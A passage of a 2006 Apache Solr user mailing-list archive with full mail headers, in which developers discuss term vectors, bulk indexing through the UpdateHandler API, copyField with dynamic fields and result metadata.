DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=UQe5BstkoWIbNATr0R8nJoi05sEmb0a3r1x9ImPmzPxo0Uv0rAqDA1R/RkKX8RMFMatsBr3qVeoyJNi+GIKqMgV8ls2pKO6XaMSjGXSZoSl1+O1LXsFZT2549oHCj/IUnTIdXMOUZOv23kqwCksiH1tp6lOM/NCen5oQmvfQSAo= Received: by 161.129.204.104 with SMTP id u13mr1587390nfj; Sat, 04 Mar 2006 07:15:22 -0800 (PST) Received: by 161.129.204.104 with HTTP; Sat, 4 Mar 2006 07:15:22 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 4 Mar 2006 10:15:22 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: XML Schema for schema.xml In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 3/3/06, Grant Ingersoll <[email protected]> wrote: > We use Term Vectors quite a bit, in fact, I was thinking of having a go a= t a patch (so if you want to point me at where to begin)... The schema should already parse and accept the following attributes on either a fieldtype or field definition: "termVectors", "termPositions", "termOffsets" (these names are in FieldProperties). SchemaField represents the <field> definitions in the schema. FieldType represents the <fieldtype> definitions in the schema. DocumentBuilder is used to build Lucene Documents, using SchemaField.createField() to create the Field, which delegates to FieldType.createField(). FieldType: public Field createField(SchemaField field, String externalVal, float boost) { String val =3D toInternal(externalVal); if (val=3D=3Dnull) return null; Field f =3D new Field(field.getName(), val, field.stored(), field.indexed(), isTokenized()); f.setOmitNorms(field.omitNorms()); f.setBoost(boost); return f; } SchemaField already has public boolean storeTermVector() { return (properties & STORE_TERMVECTORS)!= =3D0; } public boolean storeTermPositions() { return (properties & STORE_TERMPOSITIONS)!=3D0; } public boolean storeTermOffsets() { return (properties & STORE_TERMOFFSETS)!=3D0; } So it's just a matter of setting the right properties on the Lucene Field in FieldType.createField(). The harder part is figuring out what to do with TermVectors once they are stored however... Right now, they won't be returned in the XML response, you one would need to create a custom query handler to use them. > Other than that, I haven't delved into as deeply as I would like to at th= is point yet, but that is coming soon. Super! -Yonik From [email protected] Sun Mar 05 14:18:34 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74397 invoked from network); 5 Mar 2006 14:18:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Mar 2006 14:18:34 -0000 Received: (qmail 46180 invoked by uid 500); 5 Mar 2006 14:19:21 -0000 Delivered-To: [email protected] Received: (qmail 46157 invoked by uid 500); 5 Mar 2006 14:19:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 46148 invoked by uid 99); 5 Mar 2006 14:19:20 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Mar 2006 06:19:20 -0800 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_WHOIS,HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web50513.mail.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sun, 05 Mar 2006 06:19:19 -0800 Received: (qmail 4655 invoked by uid 60001); 5 Mar 2006 14:18:58 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=bfVqeH5lGDYB74TUkdS9s8eYA9Rucel9J3tgrcvmC34dvxPEmcLsNW2IcqnFQWiCmI1b0y2iqWjOB1OGnwB+KAa+9mNrHLQijUFOSHkacdmIFA4cKA/oc+c/clbvvIPqxDgLUwMOofbPgmYwmho0ANwmNwNFNPhK0qGoNgXt68Q= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web50513.mail.yahoo.com via HTTP; Sun, 05 Mar 2006 06:18:58 PST Date: Sun, 5 Mar 2006 06:18:58 -0800 (PST) From: Grant Ingersoll <[email protected]> Subject: Index Builder To: [email protected] MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-1115362551-1141568338=:4343" Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --0-1115362551-1141568338=:4343 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit What/where is the Index Builder that is referred to in http://wiki.apache.org/solr/CollectionBuilding? I can see how to do a bunch of adds over HTTP but this seems like it is less than optimal when I have all the files on the same machine and am trying to bootstrap the system. What's the best way to do this? Thanks, Grant ---------------------------------------------- Grant Ingersoll http://www.grantingersoll.com --------------------------------- Relax. Yahoo! Mail virus scanning helps detect nasty viruses! --0-1115362551-1141568338=:4343-- From [email protected] Sun Mar 05 16:14:01 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5932 invoked from network); 5 Mar 2006 16:14:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Mar 2006 16:14:01 -0000 Received: (qmail 30411 invoked by uid 500); 5 Mar 2006 16:14:47 -0000 Delivered-To: [email protected] Received: (qmail 30384 invoked by uid 500); 5 Mar 2006 16:14:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30375 invoked by uid 99); 5 Mar 2006 16:14:47 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Mar 2006 08:14:47 -0800 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_WHOIS,HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web50507.mail.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sun, 05 Mar 2006 08:14:46 -0800 Received: (qmail 66317 invoked by uid 60001); 5 Mar 2006 16:14:25 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=Owpq/eGr3EtWh4G4HJESjBAyYW6hWoY/kKhUAezJ5iMo1mEY2GmiGpP8oG47rwat9Iib0H3gOVNjlC7mCf8KgppByk14iMHSWMCk08PwDbpl8ffakiN19bFuCO+mMUo6MjDa5tYbtI9icxxM2RxTLKS+Z99AtCOStmW5oKZF6LM= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web50507.mail.yahoo.com via HTTP; Sun, 05 Mar 2006 08:14:25 PST Date: Sun, 5 Mar 2006 08:14:25 -0800 (PST) From: Grant Ingersoll <[email protected]> Subject: Copy Field and Dynamic Fields To: [email protected] MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-629189925-1141575265=:61456" Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --0-629189925-1141575265=:61456 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Can the copy field functionality be applied to dynamic fields? -Grant ---------------------------------------------- Grant Ingersoll http://www.grantingersoll.com --------------------------------- Brings words and photos together (easily) with PhotoMail - it's free and works with Yahoo! Mail. --0-629189925-1141575265=:61456-- From [email protected] Sun Mar 05 21:08:10 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2172 invoked from network); 5 Mar 2006 21:08:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Mar 2006 21:08:10 -0000 Received: (qmail 28828 invoked by uid 500); 5 Mar 2006 21:08:57 -0000 Delivered-To: [email protected] Received: (qmail 28809 invoked by uid 500); 5 Mar 2006 21:08:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28800 invoked by uid 99); 5 Mar 2006 21:08:56 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Mar 2006 13:08:56 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Mar 2006 13:08:55 -0800 Received: by nproxy.gmail.com with SMTP id a25so779839nfc for <[email protected]>; Sun, 05 Mar 2006 13:08:34 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=MrBJAcP3Tp8BDa9Eim0YStd57MrhLhmwB6EE5lOTL+gyIo+zPkw7ZjsXDAAf0eMnKeOFwestaTdi5bEoXcQXdP1UgGxwZi2zEmJrNccYOgdE4jzj9mPEilN5kfAcZJKaX7n6JIldw1UgIn5wpG3f5YOHCF6pnMJZB17BVATQW68= Received: by 161.129.204.104 with SMTP id w1mr2106652nfl; Sun, 05 Mar 2006 13:08:33 -0800 (PST) Received: by 161.129.204.104 with HTTP; Sun, 5 Mar 2006 13:08:33 -0800 (PST) Message-ID: <[email protected]> Date: Sun, 5 Mar 2006 13:08:33 -0800 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: Copy Field and Dynamic Fields In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 3/5/06, Grant Ingersoll <[email protected]> wrote: > Can the copy field functionality be applied to dynamic fields? You're finding the weak points fast, Grant :-) copyField doesn't work with dynamic fields yet, but it seems like a good think to enable. copyField from a dynamic field to a normal field seems relatively easy. copyField from a dynamic field to another dynamic field should also be doable... just strip off the prefix/suffix on the source to get the "base" name, then apply the prefix/suffix on the target to get the target dynamic field. copyField from a normal field to a dynamic field: seems unnecessary I think= . We just need to be careful of performance. Matching a field name to a dynamic field is a linear operation. In hindsight I wish I had been more restrictive on how the names could be constructed. -Yonik From [email protected] Sun Mar 05 21:14:53 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4348 invoked from network); 5 Mar 2006 21:14:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Mar 2006 21:14:53 -0000 Received: (qmail 31392 invoked by uid 500); 5 Mar 2006 21:15:39 -0000 Delivered-To: [email protected] Received: (qmail 31372 invoked by uid 500); 5 Mar 2006 21:15:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31363 invoked by uid 99); 5 Mar 2006 21:15:39 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Mar 2006 13:15:39 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Mar 2006 13:15:38 -0800 Received: by nproxy.gmail.com with SMTP id n28so788053nfc for <[email protected]>; Sun, 05 Mar 2006 13:15:17 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=Qlf9oJnWb0fMWe1RuWvPgGDDHeK0kA1vFTwCvSANFBjL43U/aIrlRo6ipapZngFo5jJbeO+URqSrOHdcFtbpCk8EmzS2R7jjDH3qy5zh7M3nyifk4fXQgMMoxxfyxyR4tyhU1U4XqzmeNLu1MO6pdHOFVc4NDOQBEHFFaRggauE= Received: by 161.129.204.104 with SMTP id 20mr2115490nfc; Sun, 05 Mar 2006 13:15:16 -0800 (PST) Received: by 161.129.204.104 with HTTP; Sun, 5 Mar 2006 13:15:16 -0800 (PST) Message-ID: <[email protected]> Date: Sun, 5 Mar 2006 13:15:16 -0800 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: Index Builder In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 3/5/06, Grant Ingersoll <[email protected]> wrote: > What/where is the Index Builder that is referred to in http://wiki.apach= e.org/solr/CollectionBuilding? It's currently client-supplied (i.e. there isn't one). Having all Solr users have to write their own builders (code that gets data from a source and posts XML documents) certainly isn't optimal. It would be nice if we could give Solr a database URL with some SQL, and have it automatically slurp and index the records. It would also be nice to be able to grab documents from a CSV or other simple structured text file and index them. These ideas are on already on the task list on the (currently down) Wiki. -Yonik From [email protected] Mon Mar 06 00:58:43 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76968 invoked from network); 6 Mar 2006 00:58:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 00:58:43 -0000 Received: (qmail 83623 invoked by uid 500); 6 Mar 2006 00:59:29 -0000 Delivered-To: [email protected] Received: (qmail 83609 invoked by uid 500); 6 Mar 2006 00:59:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83600 invoked by uid 99); 6 Mar 2006 00:59:29 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Mar 2006 16:59:29 -0800 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_WHOIS,HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web50509.mail.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sun, 05 Mar 2006 16:59:28 -0800 Received: (qmail 67804 invoked by uid 60001); 6 Mar 2006 00:59:07 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=Pgcv2s5zYQGya2C0Z1lH/mq1xuU6OADIRozOufTHQKIxnHnSpMV1pyKTTeDERYahq/F3AJv4Mw2hPTL2JDh5EQX/zuVow+TmpvWpc+hY7bWB2FT0kBh+eVcrvU9v5upVmKtIAulKsyFVvXaAdi9BS9lpRnylUxJN/tn/3VoBj/E= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web50509.mail.yahoo.com via HTTP; Sun, 05 Mar 2006 16:59:07 PST Date: Sun, 5 Mar 2006 16:59:07 -0800 (PST) From: Grant Ingersoll <[email protected]> Subject: Re: Index Builder To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-518931714-1141606747=:66539" Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --0-518931714-1141606747=:66539 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit I had a feeling that was the case. So, I was thinking I could write a driver program that takes in my files and then calls the API directly. Is this doable? How do you guys do it on your live site? Do you do it all through HTTP requests or through a driver that calls the API? I think I would prefer the API calls for bulk loading. Where should I look for these? -Grant Yonik Seeley <[email protected]> wrote: On 3/5/06, Grant Ingersoll wrote: > What/where is the Index Builder that is referred to in http://wiki.apache.org/solr/CollectionBuilding? It's currently client-supplied (i.e. there isn't one). Having all Solr users have to write their own builders (code that gets data from a source and posts XML documents) certainly isn't optimal. It would be nice if we could give Solr a database URL with some SQL, and have it automatically slurp and index the records. It would also be nice to be able to grab documents from a CSV or other simple structured text file and index them. These ideas are on already on the task list on the (currently down) Wiki. -Yonik ---------------------------------------------- Grant Ingersoll http://www.grantingersoll.com --------------------------------- Yahoo! Mail Use Photomail to share photos without annoying attachments. --0-518931714-1141606747=:66539-- From [email protected] Mon Mar 06 01:20:26 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82061 invoked from network); 6 Mar 2006 01:20:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Mar 2006 01:20:26 -0000 Received: (qmail 95069 invoked by uid 500); 6 Mar 2006 01:21:13 -0000 Delivered-To: [email protected] Received: (qmail 95048 invoked by uid 500); 6 Mar 2006 01:21:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95039 invoked by uid 99); 6 Mar 2006 01:21:13 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Mar 2006 17:21:13 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rescomp.berkeley.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 05 Mar 2006 17:21:11 -0800 Received: by rescomp.berkeley.edu (Postfix, from userid 1007) id 7289B5B766; Sun, 5 Mar 2006 17:20:47 -0800 (PST) Received: from localhost (localhost [161.129.204.104]) by rescomp.berkeley.edu (Postfix) with ESMTP id 6DAEF7F403 for <[email protected]>; Sun, 5 Mar 2006 17:20:47 -0800 (PST) Date: Sun, 5 Mar 2006 17:20:47 -0800 (PST) From: Chris Hostetter <[email protected]> To: [email protected] Subject: Re: Index Builder In-Reply-To: <[email protected]> Message-ID: <[email protected]> References: <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N : I had a feeling that was the case. So, I was thinking I could write a : driver program that takes in my files and then calls the API directly. : Is this doable? How do you guys do it on your live site? Do you do it : all through HTTP requests or through a driver that calls the API? I : think I would prefer the API calls for bulk loading. Where should I : look for these? Once upon a time, I agrued for having an robust update API, and a way to write "updater plugins" that would run within the Solr JVM ... and I was talked out of it in favor doing everything over HTTP. So yeah ... that's what I do: build/update entirely over HTTP. >From what i remember of the internal update API, you could probably write a new subclass of UpdateHandler that you register in the solrconfig.xml which pulled most of the data from wherever you want -- but it would still need to be triggered by (minimal) "<add>" messages over HTTP. alternately, you could write your own Servlet with load-on-startup="true" that used the internal update methods directly. -Hoss From [email protected] Tue Mar 07 16:20:07 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43694 invoked from network); 7 Mar 2006 16:20:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Mar 2006 16:20:03 -0000 Received: (qmail 83949 invoked by uid 500); 7 Mar 2006 16:19:39 -0000 Delivered-To: [email protected] Received: (qmail 83927 invoked by uid 500); 7 Mar 2006 16:19:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83918 invoked by uid 99); 7 Mar 2006 16:19:39 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Mar 2006 08:19:39 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Mar 2006 08:19:38 -0800 Received: by nproxy.gmail.com with SMTP id l37so1111411nfc for <[email protected]>; Tue, 07 Mar 2006 08:19:14 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=RWwSAqyYp1Tl0sOgntdLMAsN7ri/qGWSEn3DUJnLm/TQUGdVwV1Cmbl1oH7KJAJ6zY0hVcbXBZnd3xB684MLOadqKOiTVuvXsLTNx2uIDzD1jzODmwu9dhFnp0twgiMrVOjc9rqXeGXY4NGlb7uoX29pk2bjvbof0iW78ZNkMjE= Received: by 161.129.204.104 with SMTP id p1mr3058422nfd; Tue, 07 Mar 2006 08:19:13 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 7 Mar 2006 08:19:13 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 7 Mar 2006 11:19:13 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: Index Builder In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 3/5/06, Grant Ingersoll <[email protected]> wrote: > So, I was thinking I could write a driver program that takes in my files = and then calls the API directly. Is this doable? It's doable... While it will be more efficient, it's not clear how much you will gain, esp if you run with multiple CPUs (IndexWriting is highly synchronized). Check out the UpdateHandler abstract class: public abstract int addDoc(AddUpdateCommand cmd) throws IOException; public abstract void delete(DeleteUpdateCommand cmd) throws IOException; public abstract void deleteByQuery(DeleteUpdateCommand cmd) throws IOException; public abstract void commit(CommitUpdateCommand cmd) throws IOException; public abstract void close() throws IOException; While the implementation of the UpdateHandler is pluggable, there isn't a place to plug in different client handlers (like there is with RequestHandler). You could create another servlet in the same webapp and get the current UpdateHandler (SolrCore.updateHandler) and use that to update the index. Seems like there isn't a getter for SolrCore.updateHandler... feel free to sumbit a patch if you want to go this route. You could even drop down to a lower level and use DocumentBuilder to create your own Lucene Document instances and write them with an IndexWriter yourself. -Yonik > Do you do it all through HTTP requests or through a driver that calls th= e API? > I think I would prefer the API calls for bulk loading. Where should I lo= ok for these? > > -Grant > > Yonik Seeley <[email protected]> wrote: On 3/5/06, Grant Ingersoll wrote= : > > What/where is the Index Builder that is referred to in http://wiki.apa= che.org/solr/CollectionBuilding? > > It's currently client-supplied (i.e. there isn't one). > > Having all Solr users have to write their own builders (code that gets > data from a source and posts XML documents) certainly isn't optimal. > > It would be nice if we could give Solr a database URL with some SQL, > and have it automatically slurp and index the records. It would also > be nice to be able to grab documents from a CSV or other simple > structured text file and index them. > > These ideas are on already on the task list on the (currently down) Wiki. > > -Yonik From [email protected] Tue Mar 07 23:51:19 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19851 invoked from network); 7 Mar 2006 23:51:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Mar 2006 23:51:19 -0000 Received: (qmail 89745 invoked by uid 500); 7 Mar 2006 23:51:18 -0000 Delivered-To: [email protected] Received: (qmail 89700 invoked by uid 500); 7 Mar 2006 23:51:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89691 invoked by uid 99); 7 Mar 2006 23:51:18 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Mar 2006 15:51:18 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO omta14.mta.everyone.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Mar 2006 15:51:17 -0800 Received: from dm18.mta.everyone.net (bigiplb-dsnat [161.129.204.104]) by omta14.mta.everyone.net (Postfix) with ESMTP id 8E3CE40312 for <[email protected]>; Tue, 7 Mar 2006 15:50:56 -0800 (PST) X-Eon-Dm: dm18 Received: by dm18.mta.everyone.net (EON-AUTHRELAY2 - 44d5a662) id dm18.44040af4.11b964 for <[email protected]>; Tue, 7 Mar 2006 15:50:55 -0800 (PST) X-Eon-Sig: AQCUn29EDhxfcP3KnQIAAAAB,da79dd055a6c9f66e68b3e7182dd0a57 Mime-Version: 1.0 (Apple Message framework v746.2) Content-Transfer-Encoding: 7bit Message-Id: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed To: [email protected] From: Corey Tisdale <[email protected]> Subject: metadata about result sets? Date: Tue, 7 Mar 2006 17:50:54 -0600 X-Mailer: Apple Mail (2.746.2) X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi all, I just found out about solr, so naturally I have to play with it. I hate to ask anything as basic as this, but the lack of docs makes me hafta. Is there any way to get metadata about a search result off of this bad dog? I am trying to find a good way to search through several million items, and I think that being able to aggregate data about the results would help people refine the search, so if they search for "legal" I could show a result set with 22000 books but then also ask if they meant thrillers or test prep or career planning, etc. On a side note, I fell dirty now. Thanks for putting up with noobness. Corey From [email protected] Wed Mar 08 00:16:59 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32121 invoked from network); 8 Mar 2006 00:16:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Mar 2006 00:16:59 -0000 Received: (qmail 24186 invoked by uid 500); 8 Mar 2006 00:16:58 -0000 Delivered-To: [email protected] Received: (qmail 24166 invoked by uid 500); 8 Mar 2006 00:16:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24157 invoked by uid 99); 8 Mar 2006 00:16:58 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Mar 2006 16:16:58 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Mar 2006 16:16:57 -0800 Received: by nproxy.gmail.com with SMTP id p46so46263nfa for <[email protected]>; Tue, 07 Mar 2006 16:16:36 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=F8mByXu1lZtps4x7fw7gmlsrYBDWmw3X3qugN8nd2cXQyEWB+2gg6zK+jdbkX1FpYMdvVijm17kbO+4SGQpJRdPt2XCKMsAIjrpUBVqZo28QKNiFLpbOS4cRpsVfRUrdCpxGhd8eJtv1dxEXQhfzPz+gKeyKZn/eSu509QzCWR0= Received: by 161.129.204.104 with SMTP id 